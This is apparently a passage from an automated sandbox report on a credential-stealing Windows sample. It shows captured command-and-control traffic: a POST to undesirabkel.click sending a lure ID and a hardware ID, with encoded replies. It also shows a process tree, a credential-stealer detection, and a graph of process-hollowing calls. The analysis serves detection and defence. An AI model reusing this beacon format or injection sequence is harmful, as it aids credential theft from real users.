                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=9rd5qrf1cctqr4ncvfoek1lhj3; expires=Wed, 30 Apr 2025 02:28:51 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            X-Frame-Options: DENY
                                                                                            X-Content-Type-Options: nosniff
                                                                                            X-XSS-Protection: 1; mode=block
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eDIdyyWP4CzUbgDOerJdQ8SbJPF3%2BxF3%2F8r7twt7ps9db4m4VihqTeIzyhxE7XhJbFfE4cHmUKPr3hdo6K3QLfDXqrkdzWgMK5Afmbn8XRlXeHi22pZgpRXGcXFm%2FecR%2FYTKTew%3D"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8fc9ef0c0ec50cc4-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1495&min_rtt=1492&rtt_var=566&sent=203&recv=605&lost=0&retrans=0&sent_bytes=2845&recv_bytes=590438&delivery_rate=1921052&cwnd=147&unsent_bytes=0&cid=2a9f79fd7815aab2&ts=2133&x=0"


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            7192.168.2.449745188.114.96.34437696C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-04 08:42:13 UTC266OUTPOST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 89
                                                                                            Host: undesirabkel.click
                                                                                            2025-01-04 08:42:13 UTC89OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 69 69 63 72 72 69 66 6f 66 68 66 67 26 6a 3d 26 68 77 69 64 3d 44 46 32 30 32 42 41 34 33 32 39 41 34 43 38 46 45 31 42 37 31 39 38 32 41 31 30 42 36 34 36 41
                                                                                            Data Ascii: act=get_message&ver=4.0&lid=LPnhqo--iicrrifofhfg&j=&hwid=DF202BA4329A4C8FE1B71982A10B646A
                                                                                            2025-01-04 08:42:14 UTC1129INHTTP/1.1 200 OK
                                                                                            Date: Sat, 04 Jan 2025 08:42:14 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=3rl96v9e4np3fv4vg5drpcgq1e; expires=Wed, 30 Apr 2025 02:28:53 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            X-Frame-Options: DENY
                                                                                            X-Content-Type-Options: nosniff
                                                                                            X-XSS-Protection: 1; mode=block
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B%2BM1utPa%2FzfIa6d%2FYlKMevazKV2Y2to1M7a5pJ6Y0WxK5k3pjcgUeWEXhcxAHDb2X6b6T4gyc2YloZcRVrIEP8ilOPaLLTi1U9HzK7vFirMtX7Rm6hgZxKkcaViYnooYs%2BCDkdA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8fc9ef1cc91a78e7-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1970&min_rtt=1966&rtt_var=745&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2845&recv_bytes=991&delivery_rate=1461461&cwnd=234&unsent_bytes=0&cid=e543e447add6a923&ts=484&x=0"
                                                                                            2025-01-04 08:42:14 UTC240INData Raw: 33 36 65 34 0d 0a 38 62 70 36 6b 76 74 76 63 56 53 67 49 6f 69 2f 72 4a 66 39 4a 33 6d 6c 6f 66 72 78 67 50 66 4a 58 58 56 46 49 36 2f 68 5a 62 6d 71 77 56 6a 30 6a 30 31 4c 5a 59 77 41 37 5a 32 57 70 74 45 46 48 59 65 62 32 4c 4c 6f 67 4b 51 53 45 77 31 78 78 35 45 4c 34 63 50 73 47 4b 57 58 47 30 59 49 6a 30 7a 63 69 74 54 2b 69 33 51 44 33 64 57 44 6b 73 32 57 76 68 55 7a 4b 6e 72 39 30 56 44 33 75 65 67 57 70 73 35 58 50 78 50 6e 54 2b 7a 76 39 73 47 4c 55 69 36 57 31 39 47 56 30 4a 6d 4f 46 6b 77 4a 63 2b 6a 53 4c 38 47 4a 79 44 76 78 72 41 63 5a 48 50 52 4a 2f 39 44 50 33 5a 64 4a 41 5a 58 34 6d 36 75 78 7a 71 55 4b 58 6e 42 42 79 72 31 4b 6a 4d 47 52 47 63 75 4a 58 77 4a 73 77 6b 48 6d 2b 2b 76 6b 76 31
                                                                                            Data Ascii: 36e48bp6kvtvcVSgIoi/rJf9J3mlofrxgPfJXXVFI6/hZbmqwVj0j01LZYwA7Z2WptEFHYeb2LLogKQSEw1xx5EL4cPsGKWXG0YIj0zcitT+i3QD3dWDks2WvhUzKnr90VD3uegWps5XPxPnT+zv9sGLUi6W19GV0JmOFkwJc+jSL8GJyDvxrAcZHPRJ/9DP3ZdJAZX4m6uxzqUKXnBByr1KjMGRGcuJXwJswkHm++vkv1
                                                                                            2025-01-04 08:42:14 UTC1369INData Raw: 38 62 6a 75 53 65 76 74 53 31 69 42 49 57 43 33 2b 41 70 77 6e 54 77 4f 35 49 79 36 30 4b 51 67 50 38 44 61 50 4e 6c 63 47 65 5a 41 6a 4b 39 62 69 41 34 6f 47 38 43 44 67 41 54 63 75 45 41 65 58 65 7a 42 7a 71 30 44 38 30 42 73 4d 53 36 65 2f 57 72 71 45 49 48 4e 4c 75 74 49 66 54 6e 4b 67 6b 54 42 42 62 6d 4a 51 4f 34 38 4c 54 53 64 69 44 42 30 63 46 77 33 58 78 31 2b 6a 50 6c 6c 31 4d 6c 66 57 57 78 76 6a 48 6b 44 77 76 64 42 72 44 74 6b 36 4b 6b 39 38 6d 76 5a 6b 59 51 44 66 70 64 72 6a 4d 6c 66 57 65 53 54 33 69 7a 4c 69 4a 34 62 43 4d 4f 54 6f 52 59 4d 69 57 43 50 61 58 38 6a 6a 36 69 77 45 70 5a 76 5a 41 76 39 50 59 6f 4b 45 49 45 2f 47 55 6b 70 6a 32 70 4c 4d 6c 4f 7a 78 41 34 64 63 53 38 62 66 56 49 38 44 4c 57 6a 77 5a 36 47 48 52 69 70 54 7a 75
                                                                                            Data Ascii: 8bjuSevtS1iBIWC3+ApwnTwO5Iy60KQgP8DaPNlcGeZAjK9biA4oG8CDgATcuEAeXezBzq0D80BsMS6e/WrqEIHNLutIfTnKgkTBBbmJQO48LTSdiDB0cFw3Xx1+jPll1MlfWWxvjHkDwvdBrDtk6Kk98mvZkYQDfpdrjMlfWeST3izLiJ4bCMOToRYMiWCPaX8jj6iwEpZvZAv9PYoKEIE/GUkpj2pLMlOzxA4dcS8bfVI8DLWjwZ6GHRipTzu
                                                                                            2025-01-04 08:42:14 UTC1369INData Raw: 55 79 74 72 6a 72 72 74 74 42 6e 31 42 7a 49 38 68 2f 6f 4c 34 41 76 4f 38 4b 68 55 62 39 47 48 67 79 4d 48 59 6d 32 38 72 7a 64 47 55 71 62 4b 68 71 32 6f 5a 4d 52 54 7a 7a 67 76 74 78 4d 49 54 35 4b 67 56 43 53 44 5a 51 63 58 65 32 39 2b 37 53 43 44 33 6b 63 2b 38 79 37 2b 4b 42 45 42 39 52 2b 69 6d 43 4e 32 58 34 43 7a 6b 6a 6a 68 43 49 6f 74 47 32 4e 48 72 33 4d 52 72 4b 65 4b 53 73 49 62 34 68 59 67 2b 49 69 31 4c 35 37 55 4f 7a 70 37 5a 4d 50 69 56 46 30 45 4e 77 58 69 35 68 73 44 41 31 68 49 62 77 50 33 56 78 4c 44 63 71 67 51 48 64 56 43 58 67 77 62 58 74 66 30 4a 30 49 4d 4f 4e 68 48 45 62 64 7a 38 78 4f 43 51 61 42 2f 74 38 35 4b 42 37 71 2f 37 43 78 64 79 54 39 76 57 4f 5a 61 66 37 6b 2f 71 6b 68 6b 69 4c 74 68 57 38 64 7a 68 39 6f 70 76 50 38
                                                                                            Data Ascii: UytrjrrttBn1BzI8h/oL4AvO8KhUb9GHgyMHYm28rzdGUqbKhq2oZMRTzzgvtxMIT5KgVCSDZQcXe29+7SCD3kc+8y7+KBEB9R+imCN2X4CzkjjhCIotG2NHr3MRrKeKSsIb4hYg+Ii1L57UOzp7ZMPiVF0ENwXi5hsDA1hIbwP3VxLDcqgQHdVCXgwbXtf0J0IMONhHEbdz8xOCQaB/t85KB7q/7CxdyT9vWOZaf7k/qkhkiLthW8dzh9opvP8
                                                                                            2025-01-04 08:42:14 UTC1369INData Raw: 31 73 47 35 50 6a 30 71 45 4d 69 6e 56 34 6a 49 31 69 32 72 75 43 70 41 4f 66 49 56 7a 76 44 6c 77 59 70 77 43 73 66 43 6c 4c 33 4b 70 5a 6f 61 4f 77 4e 4f 37 59 6c 54 37 70 54 71 49 4f 71 49 48 68 30 37 30 42 50 72 31 66 54 62 68 78 4d 70 34 64 61 78 6e 38 4f 6e 69 32 6f 6a 4c 33 66 59 32 51 50 41 6b 4f 4d 7a 2f 72 63 6e 42 42 6a 6e 57 38 44 6e 39 76 71 4b 62 68 58 76 69 70 33 49 36 4a 57 76 4b 69 63 31 61 76 65 5a 42 74 61 58 30 69 44 32 79 78 30 53 5a 4e 67 57 2b 65 72 77 75 4a 64 58 45 4d 54 44 6f 4c 6e 72 67 59 51 76 58 6a 56 61 35 4c 67 63 37 71 66 65 4e 65 4b 35 4b 42 30 41 31 6b 76 44 6a 4d 50 77 6c 6d 6f 49 78 73 32 66 71 4d 33 4f 6e 58 59 2f 45 32 76 46 6a 52 58 34 6d 4e 38 76 71 72 55 42 50 41 69 50 52 38 2f 6d 77 38 36 4d 51 44 7a 45 38 72 7a
                                                                                            Data Ascii: 1sG5Pj0qEMinV4jI1i2ruCpAOfIVzvDlwYpwCsfClL3KpZoaOwNO7YlT7pTqIOqIHh070BPr1fTbhxMp4daxn8Oni2ojL3fY2QPAkOMz/rcnBBjnW8Dn9vqKbhXvip3I6JWvKic1aveZBtaX0iD2yx0SZNgW+erwuJdXEMTDoLnrgYQvXjVa5Lgc7qfeNeK5KB0A1kvDjMPwlmoIxs2fqM3OnXY/E2vFjRX4mN8vqrUBPAiPR8/mw86MQDzE8rz
                                                                                            2025-01-04 08:42:14 UTC1369INData Raw: 67 6f 43 45 6c 48 70 30 46 79 4a 75 2b 5a 56 33 35 4d 36 46 68 33 4b 53 66 48 6a 67 38 37 4f 45 6b 6e 51 35 34 43 69 31 34 54 35 62 7a 51 77 5a 2f 71 4e 56 75 75 63 34 43 7a 32 74 44 73 7a 4e 64 4e 4a 30 49 7a 39 78 5a 52 31 53 66 61 54 76 4a 4f 33 73 5a 73 6e 54 41 42 6c 7a 61 34 6b 77 37 7a 4e 4f 66 53 42 57 51 49 34 35 55 62 50 33 50 54 6e 71 47 45 77 37 4d 71 74 73 73 65 53 69 67 77 7a 45 33 50 4b 76 55 71 49 6f 50 55 33 6f 70 6b 58 43 77 50 6c 53 75 54 61 79 74 4f 34 46 30 44 4c 30 5a 58 42 7a 4c 43 5a 4e 52 4d 2f 53 4e 65 4f 4d 65 43 74 6c 54 4b 35 6f 52 30 58 43 49 39 33 34 59 66 47 77 34 56 71 50 35 33 6a 6c 6f 44 6c 72 72 74 74 4a 53 70 30 79 4b 63 39 37 72 6a 2b 54 4f 71 36 57 42 67 73 30 31 48 78 36 73 48 59 6d 32 45 4d 77 38 79 6a 6e 73 71 43
                                                                                            Data Ascii: goCElHp0FyJu+ZV35M6Fh3KSfHjg87OEknQ54Ci14T5bzQwZ/qNVuuc4Cz2tDszNdNJ0Iz9xZR1SfaTvJO3sZsnTABlza4kw7zNOfSBWQI45UbP3PTnqGEw7MqtsseSigwzE3PKvUqIoPU3opkXCwPlSuTaytO4F0DL0ZXBzLCZNRM/SNeOMeCtlTK5oR0XCI934YfGw4VqP53jloDlrrttJSp0yKc97rj+TOq6WBgs01Hx6sHYm2EMw8yjnsqC
                                                                                            2025-01-04 08:42:14 UTC1369INData Raw: 4a 36 6d 74 41 41 33 4c 75 50 4c 4d 57 6f 46 69 63 38 6b 48 6a 4b 38 50 6e 6a 6e 33 63 75 77 35 54 4d 71 37 53 38 6d 41 73 53 50 30 66 4e 74 43 33 75 6c 74 49 37 30 62 38 75 47 7a 72 31 62 73 66 78 32 73 4b 50 59 7a 36 64 2b 4b 69 63 32 71 47 74 45 69 45 6e 61 5a 61 41 49 4d 2b 68 36 44 6e 4f 31 44 73 6e 4a 75 74 73 76 4e 36 59 35 72 46 54 4f 49 37 5a 7a 62 76 4d 6f 61 59 52 42 44 78 7a 33 61 34 68 2f 35 37 6a 4b 4b 4c 4f 49 51 49 36 6b 55 33 55 6b 4e 7a 7a 75 47 74 4c 77 66 61 4a 6e 72 4f 57 71 47 55 2b 47 51 7a 6b 67 31 44 53 73 49 49 59 77 72 77 33 51 44 4f 5a 43 64 37 74 37 66 57 53 45 77 76 48 38 61 32 58 74 4a 32 66 62 54 41 63 53 4e 6e 54 4f 5a 62 43 79 56 48 69 6d 51 6f 74 65 35 56 6f 76 74 44 74 78 35 70 4c 51 63 6a 37 6f 4c 33 6f 6f 76 34 77 4e
                                                                                            Data Ascii: J6mtAA3LuPLMWoFic8kHjK8Pnjn3cuw5TMq7S8mAsSP0fNtC3ultI70b8uGzr1bsfx2sKPYz6d+Kic2qGtEiEnaZaAIM+h6DnO1DsnJutsvN6Y5rFTOI7ZzbvMoaYRBDxz3a4h/57jKKLOIQI6kU3UkNzzuGtLwfaJnrOWqGU+GQzkg1DSsIIYwrw3QDOZCd7t7fWSEwvH8a2XtJ2fbTAcSNnTOZbCyVHimQote5VovtDtx5pLQcj7oL3oov4wN
                                                                                            2025-01-04 08:42:14 UTC1369INData Raw: 39 53 73 4f 55 2b 42 7a 31 6a 31 59 62 45 35 42 55 2f 65 69 66 34 64 5a 44 4c 76 58 72 6a 59 54 6a 6b 66 46 74 44 44 46 4e 33 59 34 78 36 4a 6e 79 48 73 57 71 4e 79 31 37 32 56 44 55 6b 49 66 50 69 51 77 36 6c 70 4f 33 6b 39 50 63 2f 44 38 51 47 51 79 61 30 44 79 42 6e 2b 6f 79 36 73 49 56 4a 52 2b 54 43 66 33 58 34 74 53 34 51 30 6a 2f 77 4a 79 74 72 37 75 5a 45 42 4d 42 63 63 65 58 4f 5a 61 6f 77 67 37 65 7a 41 4d 46 59 2f 77 4e 35 74 33 68 79 39 4a 64 46 38 76 56 67 72 62 68 7a 6f 51 38 41 67 31 2f 67 4c 68 64 33 49 76 77 4e 64 6a 49 46 69 4d 75 79 48 6a 39 39 65 44 69 68 58 49 32 38 66 57 4e 71 64 47 38 6e 41 6b 2f 66 57 76 43 6c 68 7a 65 71 59 67 2f 34 4d 67 58 4f 67 4c 46 64 4f 48 52 33 36 4f 54 54 52 6a 77 31 6f 75 2b 38 4b 76 6d 41 56 70 33 62 73
                                                                                            Data Ascii: 9SsOU+Bz1j1YbE5BU/eif4dZDLvXrjYTjkfFtDDFN3Y4x6JnyHsWqNy172VDUkIfPiQw6lpO3k9Pc/D8QGQya0DyBn+oy6sIVJR+TCf3X4tS4Q0j/wJytr7uZEBMBcceXOZaowg7ezAMFY/wN5t3hy9JdF8vVgrbhzoQ8Ag1/gLhd3IvwNdjIFiMuyHj99eDihXI28fWNqdG8nAk/fWvClhzeqYg/4MgXOgLFdOHR36OTTRjw1ou+8KvmAVp3bs
                                                                                            2025-01-04 08:42:14 UTC1369INData Raw: 71 4d 6b 39 71 36 6b 46 47 51 69 50 59 65 44 39 2f 63 76 53 63 44 33 70 6b 35 47 44 35 4c 2f 34 5a 42 4d 52 45 4f 6d 58 42 74 50 44 39 54 2f 69 6a 56 59 53 4f 75 52 4c 6f 38 75 55 77 4a 78 4c 4c 76 4c 62 72 37 6e 4b 6f 4b 55 79 44 54 64 69 79 6f 4d 43 30 61 32 56 43 38 4f 4d 4f 42 41 36 39 45 7a 77 6a 2f 33 5a 72 42 55 2f 6c 76 76 52 67 65 4b 53 71 69 38 77 4d 6e 50 75 70 68 4c 56 79 4d 6f 6f 2f 62 38 42 47 7a 7a 76 43 63 76 33 77 4e 48 46 5a 42 48 53 7a 4c 2b 31 35 4b 53 73 46 42 73 63 64 4a 69 74 55 74 57 46 6a 54 58 41 69 56 30 34 4f 63 39 44 78 65 76 55 7a 71 73 4d 45 50 6d 4f 6b 63 54 6e 71 2b 59 58 50 77 42 51 6d 4e 41 77 2b 35 66 57 54 66 53 63 47 30 67 2b 35 78 4c 2b 79 76 75 6b 69 77 77 64 36 50 61 79 76 71 75 69 68 52 63 50 49 55 53 45 75 54 7a
                                                                                            Data Ascii: qMk9q6kFGQiPYeD9/cvScD3pk5GD5L/4ZBMREOmXBtPD9T/ijVYSOuRLo8uUwJxLLvLbr7nKoKUyDTdiyoMC0a2VC8OMOBA69Ezwj/3ZrBU/lvvRgeKSqi8wMnPuphLVyMoo/b8BGzzvCcv3wNHFZBHSzL+15KSsFBscdJitUtWFjTXAiV04Oc9DxevUzqsMEPmOkcTnq+YXPwBQmNAw+5fWTfScG0g+5xL+yvukiwwd6PayvquihRcPIUSEuTz
                                                                                            2025-01-04 08:42:14 UTC1369INData Raw: 76 79 30 44 42 38 47 6b 78 66 6c 33 4a 37 46 73 52 42 53 6e 4a 66 4b 6e 39 6a 47 73 53 67 6c 45 57 54 58 6c 44 4c 61 6f 2f 45 43 2f 62 30 5a 50 41 62 49 61 4d 62 61 35 4e 4c 4e 45 67 72 72 35 6f 32 63 34 63 53 54 44 53 55 7a 47 70 79 58 54 74 32 6b 31 44 4b 35 77 69 45 31 45 35 64 34 38 50 37 65 33 37 68 77 44 66 66 70 6c 35 72 36 75 71 6f 49 48 79 74 67 6e 34 51 41 34 34 58 4f 45 66 2f 51 52 44 55 78 79 42 65 35 35 63 2f 79 6b 78 63 4f 36 4d 44 4e 6e 38 47 57 75 6a 38 33 4a 46 6e 71 67 79 37 74 6c 38 49 43 38 62 51 31 46 77 61 58 65 4f 62 59 6e 73 4f 58 45 45 32 63 6c 72 61 66 30 63 4b 78 41 56 6f 5a 44 50 75 6a 48 63 75 36 32 53 7a 7a 67 31 30 33 4a 76 46 77 2b 59 72 69 6f 4c 56 69 48 70 44 47 6e 72 62 48 6a 5a 41 2b 58 69 51 51 33 72 45 56 37 72 66 51
                                                                                            Data Ascii: vy0DB8Gkxfl3J7FsRBSnJfKn9jGsSglEWTXlDLao/EC/b0ZPAbIaMba5NLNEgrr5o2c4cSTDSUzGpyXTt2k1DK5wiE1E5d48P7e37hwDffpl5r6uqoIHytgn4QA44XOEf/QRDUxyBe55c/ykxcO6MDNn8GWuj83JFnqgy7tl8IC8bQ1FwaXeObYnsOXEE2clraf0cKxAVoZDPujHcu62Szzg103JvFw+YrioLViHpDGnrbHjZA+XiQQ3rEV7rfQ


                                                                                            Click to jump to process

                                                                                            Click to jump to process

                                                                                            Click to dive into process behavior distribution

                                                                                            Click to jump to process

                                                                                            Target ID:0
                                                                                            Start time:03:41:58
                                                                                            Start date:04/01/2025
                                                                                            Path:C:\Users\user\Desktop\9cOUjp7ybm.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\9cOUjp7ybm.exe"
                                                                                            Imagebase:0x3d0000
                                                                                            File size:760'832 bytes
                                                                                            MD5 hash:7177B0BA961DDD258EE9672D436D6B63
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Target ID:1
                                                                                            Start time:03:41:58
                                                                                            Start date:04/01/2025
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7699e0000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:false

                                                                                            Target ID:2
                                                                                            Start time:03:41:58
                                                                                            Start date:04/01/2025
                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                                                                                            Imagebase:0x200000
                                                                                            File size:43'016 bytes
                                                                                            MD5 hash:5D1D74198D75640E889F0A577BBF31FC
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1796834201.0000000002B39000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:moderate
                                                                                            Has exited:false

                                                                                            Target ID:4
                                                                                            Start time:03:41:58
                                                                                            Start date:04/01/2025
                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7616 -s 1224
                                                                                            Imagebase:0x9c0000
                                                                                            File size:483'680 bytes
                                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Reset < >

                                                                                              Execution Graph

                                                                                              Execution Coverage:12.5%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:14.5%
                                                                                              Total number of Nodes:647
                                                                                              Total number of Limit Nodes:8
                                                                                              execution_graph 11811 6ce18870 11819 6ce18890 __DllMainCRTStartup@12 11811->11819 11812 6ce1ad5a CreateProcessW 11812->11819 11813 6ce1cf6d NtReadVirtualMemory 11813->11819 11814 6ce1e801 CreateProcessW 11814->11819 11815 6ce1a1fa GetConsoleWindow 11815->11819 11816 6ce1e8c0 NtWriteVirtualMemory 11816->11819 11817 6ce1b493 NtWriteVirtualMemory 11817->11819 11818 6ce1af71 NtAllocateVirtualMemory 11818->11819 11819->11812 11819->11813 11819->11814 11819->11815 11819->11816 11819->11817 11819->11818 11820 6ce1a4f3 VirtualAlloc 11819->11820 11821 6ce1eb26 NtWriteVirtualMemory 11819->11821 11822 6ce1d19f NtWriteVirtualMemory 11819->11822 11823 6ce1a2b7 ShowWindow 11819->11823 11825 6ce117c0 30 API calls 11819->11825 11827 6ce1ae6d NtGetContextThread 11819->11827 11829 6ce1d76b NtWriteVirtualMemory 11819->11829 11830 6ce1e18b 11819->11830 11833 6ce1dee9 NtSetContextThread NtResumeThread 11819->11833 11834 6ce1aed2 NtAllocateVirtualMemory 11819->11834 11835 6ce1db53 NtCreateThreadEx 11819->11835 11836 6ce1e076 CloseHandle CloseHandle 11819->11836 11837 6ce1b977 NtWriteVirtualMemory 11819->11837 11838 6ce1e639 NtReadVirtualMemory 11819->11838 11839 6ce1afdc NtWriteVirtualMemory 11819->11839 11840 6ce1ec25 NtSetContextThread NtResumeThread 11819->11840 11870 6ce17960 11819->11870 11881 6ce11010 11819->11881 11820->11819 11821->11819 11822->11819 11841 6ce117c0 11823->11841 11825->11819 11827->11819 11829->11819 11885 6ce1f980 11830->11885 11832 6ce1e195 11833->11819 11834->11819 11835->11819 11836->11819 11837->11819 11838->11819 11839->11819 11840->11819 11866 6ce11820 ___scrt_uninitialize_crt 11841->11866 11842 6ce1288b GetCurrentProcess 11842->11866 11843 6ce14d2c CreateFileA 11843->11866 11844 6ce14816 CloseHandle CloseHandle 11844->11866 11845 6ce15117 VirtualProtect 11845->11866 11846 6ce1544b CloseHandle 11846->11866 11847 6ce15057 VirtualProtect 11847->11866 11848 6ce1491f CloseHandle 11848->11866 11849 6ce135a6 CloseHandle 11849->11866 11850 6ce12eb8 GetModuleFileNameA 11850->11866 11851 6ce1291d ___scrt_uninitialize_crt __DllMainCRTStartup@12 11851->11845 11852 6ce12940 GetModuleHandleA 11851->11852 11852->11866 11853 6ce13057 CreateFileA 11853->11866 11854 6ce12c33 K32GetModuleInformation 11854->11866 11855 6ce138ab MapViewOfFile 11855->11866 11856 6ce14de9 CloseHandle 11856->11866 11857 6ce13217 CreateFileMappingA 11857->11866 11858 6ce14bcd 11859 6ce1f980 _ValidateLocalCookies 5 API calls 11858->11859 11860 6ce14bd7 11859->11860 11860->11819 11861 6ce1540e CloseHandle CloseHandle 11861->11866 11862 6ce154a3 CreateFileA 11862->11866 11863 6ce152ce MapViewOfFile 11863->11866 11864 6ce15259 CreateFileMappingA 11864->11866 11865 6ce151ff CreateFileA 11865->11866 11866->11842 11866->11843 11866->11844 11866->11846 11866->11847 11866->11848 11866->11849 11866->11850 11866->11851 11866->11853 11866->11854 11866->11855 11866->11856 11866->11857 11866->11858 11866->11861 11866->11862 11866->11863 11866->11864 11866->11865 11867 6ce14576 VirtualProtect 11866->11867 11868 6ce14307 VirtualProtect 11866->11868 11869 6ce14e16 MapViewOfFile 11866->11869 11867->11866 11868->11866 11869->11866 11871 6ce179b1 __DllMainCRTStartup@12 11870->11871 11872 6ce18470 11871->11872 11875 6ce18638 GetModuleHandleW 11871->11875 11877 6ce17f91 GetModuleHandleW 11871->11877 11880 6ce17ff2 NtQueryInformationProcess 11871->11880 11873 6ce1f980 _ValidateLocalCookies 5 API calls 11872->11873 11874 6ce18480 11873->11874 11874->11819 11876 6ce15540 5 API calls 11875->11876 11879 6ce1866f __DllMainCRTStartup@12 11876->11879 11892 6ce15540 11877->11892 11879->11871 11880->11871 11882 6ce1106f 11881->11882 11883 6ce1f980 _ValidateLocalCookies 5 API calls 11882->11883 11884 6ce11669 11883->11884 11884->11819 11886 6ce1f989 IsProcessorFeaturePresent 11885->11886 11887 6ce1f988 11885->11887 11889 6ce1fd2e 11886->11889 11887->11832 11896 6ce1fcf1 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 11889->11896 11891 6ce1fe11 11891->11832 11893 6ce155b1 11892->11893 11894 6ce1f980 _ValidateLocalCookies 5 API calls 11893->11894 11895 6ce1745e 11894->11895 11895->11871 11896->11891 11897 6ce25070 11898 6ce2507d 11897->11898 11909 6ce22dd6 11898->11909 11902 6ce250a3 11903 6ce22dd6 __dosmaperr 14 API calls 11902->11903 11906 6ce250c9 11902->11906 11905 6ce250bd 11903->11905 11907 6ce22e33 _free 14 API calls 11905->11907 11908 6ce250d5 11906->11908 11922 6ce24602 11906->11922 11907->11906 11915 6ce22de3 __dosmaperr 11909->11915 11910 6ce22e23 11930 6ce22dc3 11910->11930 11911 6ce22e0e RtlAllocateHeap 11913 6ce22e21 11911->11913 11911->11915 11916 6ce22e33 11913->11916 11915->11910 11915->11911 11927 6ce249f5 11915->11927 11917 6ce22e67 __dosmaperr 11916->11917 11918 6ce22e3e HeapFree 11916->11918 11917->11902 11918->11917 11919 6ce22e53 11918->11919 11920 6ce22dc3 __dosmaperr 12 API calls 11919->11920 11921 6ce22e59 GetLastError 11920->11921 11921->11917 11923 6ce24421 __dosmaperr 5 API calls 11922->11923 11924 6ce2461e 11923->11924 11925 6ce2463c InitializeCriticalSectionAndSpinCount 11924->11925 11926 6ce24627 11924->11926 11925->11926 11926->11906 11933 6ce24a22 11927->11933 11944 6ce2298e GetLastError 11930->11944 11932 6ce22dc8 11932->11913 11934 6ce24a2e ___scrt_is_nonwritable_in_current_image 11933->11934 11939 6ce22aca EnterCriticalSection 11934->11939 11936 6ce24a39 11940 6ce24a75 11936->11940 11939->11936 11943 6ce22b12 LeaveCriticalSection 11940->11943 11942 6ce24a00 11942->11915 11943->11942 11945 6ce229a5 11944->11945 11949 6ce229ab 11944->11949 11967 6ce24581 11945->11967 11966 6ce229b1 SetLastError 11949->11966 11972 6ce245c0 11949->11972 11950 6ce22dd6 __dosmaperr 12 API calls 11952 6ce229d9 11950->11952 11953 6ce229e1 11952->11953 11954 6ce229f8 11952->11954 11955 6ce245c0 __dosmaperr 6 API calls 11953->11955 11956 6ce245c0 __dosmaperr 6 API calls 11954->11956 11958 6ce229ef 11955->11958 11957 6ce22a04 11956->11957 11959 6ce22a08 11957->11959 11960 6ce22a19 11957->11960 11963 6ce22e33 _free 12 API calls 11958->11963 11961 6ce245c0 __dosmaperr 6 API calls 11959->11961 11977 6ce22639 11960->11977 11961->11958 11963->11966 11965 6ce22e33 _free 12 API calls 11965->11966 11966->11932 11982 6ce24421 11967->11982 11969 6ce2459d 11970 6ce245a6 